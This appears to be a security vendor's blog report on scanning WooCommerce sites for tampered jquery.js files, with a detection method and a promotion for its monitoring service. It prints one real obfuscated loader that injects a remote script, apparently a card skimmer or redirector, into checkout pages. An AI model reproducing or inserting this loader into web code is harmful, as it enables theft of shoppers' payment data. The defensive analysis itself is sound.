Report: Compromised WooCommerce Websites

We have always focused on backend security on this blog. However, attackers sometimes try to steal sensitive information, including credit card numbers. That’s why we piloted our script verification service which aims to protect websites from frontend attacks, including formjacking/magecart/form scraping as well as redirecting users to malicious sites. The British Airways breach is a famous example of such an attack performed by injecting code in static javascript files. That’s why we piloted our script verification service Scriptinel, where you can monitor in real-time all the code changes.

Recently there has been an increase in attacks against WooCommerce installations. WooCommerce, a WordPress plugin, is allegedly the most popular eCommerce platform. “Allegedly”, because numbers are hard to calculate precisely – many website reports having WooCommerce in their meta tags, but are not actually running it – it often comes bundled with the theme. But nevertheless, WooCommerce is popular and increasingly a target of attacks.

We decided to use our script verification utilities to investigate how many sites using WooCommerce may be compromised. For that purpose, we obtained a list of a few hundred thousand WooCommerce URLs and scanned the most likely target of attacks – jquery.js, the script that every WordPress installation has, and that is included on every page, including the credit card information page.

The results are optimistic. Out of 236,146 scanned websites, only 44 appear to be compromised. Usually, the injected script is obfuscated and includes scripts from external sources (after multiple redirects). We did not assess each individual malicious script, but they can in theory collect any data entered on the page and/or redirect to a malicious website. We have contacted the owners of those sites with instructions to have them fixed.

The scanning approach relies on having the canonical jQuery (either original or WordPress-bundled) as a baseline and comparing the jquery.js file against it (minified or not). In case of any discrepancy (after some basic normalization), a mismatch is reported which is then individually investigated. In some cases website, admins have opted for the questionable practice to manually edit their jquery.js file, so the method yields some false positives, but they were removed as part of the analysis.

Here is a typical malicious script appended (or prepended) to jquery.js:

var gdjfgjfgj235f = 1; var d=document;var s=d.createElement(‘script’); s.type=’text/javascript’; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName(‘head’)[0].appendChild(s);
}

The URL from which the malicious script is fetched is encoded, so we have to decode it and follow it. Using curl one can follow the chain of redirects that usually follows to end up seeing the actual script, which either collects data from forms on the screen or opens a malicious website. jquery.js is only one potential script – we are currently inspecting all credit-card related WooCommerce scripts as well.

privacy-in-time-of-pandemic

The numbers are good for now, but malicious actors are actively seeking ways to compromise eCommerce websites and with the rise of eCommerce due to the pandemic, all off-the-shelf platforms (WooCommerce, Magento, Shopify, OpenCart) are to be closely monitored for changes.

If you would like to prevent data breaches through your frontend, create a free Scriptinel account to scan your website and get real-time alerts in case a malicious actor tampers with your scripts.

SIGN UP TO SCRIPTINEL